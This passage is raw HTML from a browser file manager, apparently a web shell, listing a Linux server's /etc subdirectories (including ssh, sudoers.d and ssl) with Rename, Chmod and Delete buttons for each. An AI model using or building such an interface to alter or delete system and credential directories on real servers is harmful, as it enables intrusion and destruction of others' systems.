                                <button onclick="showRename('/etc/pm','pm')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pm','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pm',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="polkit-1">
                            <td><a href="?p=%2Fetc%2Fpolkit-1" class="folder-link">📁 polkit-1</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-21 09:50</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/polkit-1','polkit-1')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/polkit-1','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/polkit-1',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="popt.d">
                            <td><a href="?p=%2Fetc%2Fpopt.d" class="folder-link">📁 popt.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2022-03-25 20:32</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/popt.d','popt.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/popt.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/popt.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="portreserve">
                            <td><a href="?p=%2Fetc%2Fportreserve" class="folder-link">📁 portreserve</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:12</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/portreserve','portreserve')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/portreserve','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/portreserve',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="prelink.conf.d">
                            <td><a href="?p=%2Fetc%2Fprelink.conf.d" class="folder-link">📁 prelink.conf.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/prelink.conf.d','prelink.conf.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/prelink.conf.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/prelink.conf.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="profile.d">
                            <td><a href="?p=%2Fetc%2Fprofile.d" class="folder-link">📁 profile.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-18 03:35</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/profile.d','profile.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/profile.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/profile.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="proftpd">
                            <td><a href="?p=%2Fetc%2Fproftpd" class="folder-link">📁 proftpd</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0751</span></td>
                            <td>2026-08-20 10:35</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/proftpd','proftpd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/proftpd','0751')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/proftpd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="proxy_conf">
                            <td><a href="?p=%2Fetc%2Fproxy_conf" class="folder-link">📁 proxy_conf</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0333</span></td>
                            <td>2026-08-19 20:11</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/proxy_conf','proxy_conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/proxy_conf','0333')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/proxy_conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="proxy_notify">
                            <td><a href="?p=%2Fetc%2Fproxy_notify" class="folder-link">📁 proxy_notify</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0733</span></td>
                            <td>2026-08-20 10:51</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/proxy_notify','proxy_notify')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/proxy_notify','0733')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/proxy_notify',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="psa">
                            <td><a href="?p=%2Fetc%2Fpsa" class="folder-link">📁 psa</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-23 16:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/psa','psa')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/psa','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/psa',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pulse">
                            <td><a href="?p=%2Fetc%2Fpulse" class="folder-link">📁 pulse</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/pulse','pulse')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pulse','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pulse',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="puppet">
                            <td><a href="?p=%2Fetc%2Fpuppet" class="folder-link">📁 puppet</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0700</span></td>
                            <td>2026-05-22 19:16</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/puppet','puppet')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/puppet','0700')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/puppet',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="pure-ftpd">
                            <td><a href="?p=%2Fetc%2Fpure-ftpd" class="folder-link">📁 pure-ftpd</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0711</span></td>
                            <td>2025-11-05 00:02</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/pure-ftpd','pure-ftpd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/pure-ftpd','0711')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/pure-ftpd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rbld.d">
                            <td><a href="?p=%2Fetc%2Frbld.d" class="folder-link">📁 rbld.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rbld.d','rbld.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rbld.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rbld.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc.d">
                            <td><a href="?p=%2Fetc%2Frc.d" class="folder-link">📁 rc.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc.d','rc.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc0.d">
                            <td><a href="?p=%2Fetc%2Frc0.d" class="folder-link">📁 rc0.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc0.d','rc0.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc0.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc0.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc1.d">
                            <td><a href="?p=%2Fetc%2Frc1.d" class="folder-link">📁 rc1.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc1.d','rc1.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc1.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc1.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc2.d">
                            <td><a href="?p=%2Fetc%2Frc2.d" class="folder-link">📁 rc2.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:14</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc2.d','rc2.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc2.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc2.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc3.d">
                            <td><a href="?p=%2Fetc%2Frc3.d" class="folder-link">📁 rc3.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:14</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc3.d','rc3.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc3.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc3.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc4.d">
                            <td><a href="?p=%2Fetc%2Frc4.d" class="folder-link">📁 rc4.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:14</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc4.d','rc4.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc4.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc4.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc5.d">
                            <td><a href="?p=%2Fetc%2Frc5.d" class="folder-link">📁 rc5.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:14</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc5.d','rc5.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc5.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc5.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rc6.d">
                            <td><a href="?p=%2Fetc%2Frc6.d" class="folder-link">📁 rc6.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rc6.d','rc6.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rc6.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rc6.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="request-key.d">
                            <td><a href="?p=%2Fetc%2Frequest-key.d" class="folder-link">📁 request-key.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/request-key.d','request-key.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/request-key.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/request-key.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rpm">
                            <td><a href="?p=%2Fetc%2Frpm" class="folder-link">📁 rpm</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-13 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rpm','rpm')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rpm','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rpm',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rsyslog.d">
                            <td><a href="?p=%2Fetc%2Frsyslog.d" class="folder-link">📁 rsyslog.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 14:50</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rsyslog.d','rsyslog.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rsyslog.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rsyslog.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="rwtab.d">
                            <td><a href="?p=%2Fetc%2Frwtab.d" class="folder-link">📁 rwtab.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-16 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/rwtab.d','rwtab.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/rwtab.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/rwtab.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="samba">
                            <td><a href="?p=%2Fetc%2Fsamba" class="folder-link">📁 samba</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-12 09:24</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/samba','samba')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/samba','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/samba',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sasl2">
                            <td><a href="?p=%2Fetc%2Fsasl2" class="folder-link">📁 sasl2</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-25 11:46</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/sasl2','sasl2')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sasl2','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sasl2',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="scl">
                            <td><a href="?p=%2Fetc%2Fscl" class="folder-link">📁 scl</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:09</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/scl','scl')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/scl','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/scl',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="security">
                            <td><a href="?p=%2Fetc%2Fsecurity" class="folder-link">📁 security</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-04 23:44</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/security','security')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/security','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/security',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="selinux">
                            <td><a href="?p=%2Fetc%2Fselinux" class="folder-link">📁 selinux</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-18 03:35</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/selinux','selinux')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/selinux','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/selinux',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sgml">
                            <td><a href="?p=%2Fetc%2Fsgml" class="folder-link">📁 sgml</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:06</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/sgml','sgml')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sgml','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sgml',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="skel">
                            <td><a href="?p=%2Fetc%2Fskel" class="folder-link">📁 skel</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/skel','skel')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/skel','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/skel',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="skipresbackup">
                            <td><a href="?p=%2Fetc%2Fskipresbackup" class="folder-link">📁 skipresbackup</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0770</span></td>
                            <td>2026-08-20 04:46</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/skipresbackup','skipresbackup')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/skipresbackup','0770')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/skipresbackup',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="smartmontools">
                            <td><a href="?p=%2Fetc%2Fsmartmontools" class="folder-link">📁 smartmontools</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-08 20:38</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/smartmontools','smartmontools')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/smartmontools','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/smartmontools',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="snmp">
                            <td><a href="?p=%2Fetc%2Fsnmp" class="folder-link">📁 snmp</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-10 02:30</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/snmp','snmp')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/snmp','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/snmp',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ssh">
                            <td><a href="?p=%2Fetc%2Fssh" class="folder-link">📁 ssh</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-14 20:20</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/ssh','ssh')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ssh','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ssh',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sshd_client">
                            <td><a href="?p=%2Fetc%2Fsshd_client" class="folder-link">📁 sshd_client</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0700</span></td>
                            <td>2026-05-28 06:41</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/sshd_client','sshd_client')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sshd_client','0700')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sshd_client',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ssl">
                            <td><a href="?p=%2Fetc%2Fssl" class="folder-link">📁 ssl</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-11-20 09:52</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/ssl','ssl')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ssl','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ssl',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sssd">
                            <td><a href="?p=%2Fetc%2Fsssd" class="folder-link">📁 sssd</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0700</span></td>
                            <td>2026-07-23 19:31</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/sssd','sssd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sssd','0700')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sssd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="statetab.d">
                            <td><a href="?p=%2Fetc%2Fstatetab.d" class="folder-link">📁 statetab.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-10-02 21:00</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/statetab.d','statetab.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/statetab.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/statetab.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sudoers.d">
                            <td><a href="?p=%2Fetc%2Fsudoers.d" class="folder-link">📁 sudoers.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0750</span></td>
                            <td>2026-07-22 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/sudoers.d','sudoers.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sudoers.d','0750')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sudoers.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sysconfig">
                            <td><a href="?p=%2Fetc%2Fsysconfig" class="folder-link">📁 sysconfig</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 03:36</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/sysconfig','sysconfig')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sysconfig','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sysconfig',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="sysctl.d">
                            <td><a href="?p=%2Fetc%2Fsysctl.d" class="folder-link">📁 sysctl.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/sysctl.d','sysctl.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/sysctl.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/sysctl.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="systemd">
                            <td><a href="?p=%2Fetc%2Fsystemd" class="folder-link">📁 systemd</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/systemd','systemd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/systemd','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/systemd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="terminfo">
                            <td><a href="?p=%2Fetc%2Fterminfo" class="folder-link">📁 terminfo</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-21 09:24</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/terminfo','terminfo')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/terminfo','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/terminfo',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="texlive">
                            <td><a href="?p=%2Fetc%2Ftexlive" class="folder-link">📁 texlive</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:03</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/texlive','texlive')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/texlive','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/texlive',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="tmpfiles.d">
                            <td><a href="?p=%2Fetc%2Ftmpfiles.d" class="folder-link">📁 tmpfiles.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/tmpfiles.d','tmpfiles.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/tmpfiles.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/tmpfiles.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="tpm2-tss">
                            <td><a href="?p=%2Fetc%2Ftpm2-tss" class="folder-link">📁 tpm2-tss</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-11-18 19:21</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/tpm2-tss','tpm2-tss')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/tpm2-tss','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/tpm2-tss',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="tuned">
                            <td><a href="?p=%2Fetc%2Ftuned" class="folder-link">📁 tuned</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-23 16:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/tuned','tuned')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/tuned','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/tuned',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="udev">
                            <td><a href="?p=%2Fetc%2Fudev" class="folder-link">📁 udev</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-04 21:16</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/udev','udev')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/udev','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/udev',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="valiases">
                            <td><a href="?p=%2Fetc%2Fvaliases" class="folder-link">📁 valiases</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0751</span></td>
                            <td>2026-08-19 20:31</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/valiases','valiases')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/valiases','0751')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/valiases',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="vdomainaliases">
                            <td><a href="?p=%2Fetc%2Fvdomainaliases" class="folder-link">📁 vdomainaliases</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0751</span></td>
                            <td>2026-08-19 20:31</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/vdomainaliases','vdomainaliases')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/vdomainaliases','0751')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/vdomainaliases',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="vfilters">
                            <td><a href="?p=%2Fetc%2Fvfilters" class="folder-link">📁 vfilters</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0751</span></td>
                            <td>2026-08-19 20:31</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/vfilters','vfilters')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/vfilters','0751')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/vfilters',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wireplumber">
                            <td><a href="?p=%2Fetc%2Fwireplumber" class="folder-link">📁 wireplumber</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-15 10:19</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/wireplumber','wireplumber')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/wireplumber','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/wireplumber',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="xdg">
                            <td><a href="?p=%2Fetc%2Fxdg" class="folder-link">📁 xdg</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/xdg','xdg')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/xdg','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/xdg',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="xml">
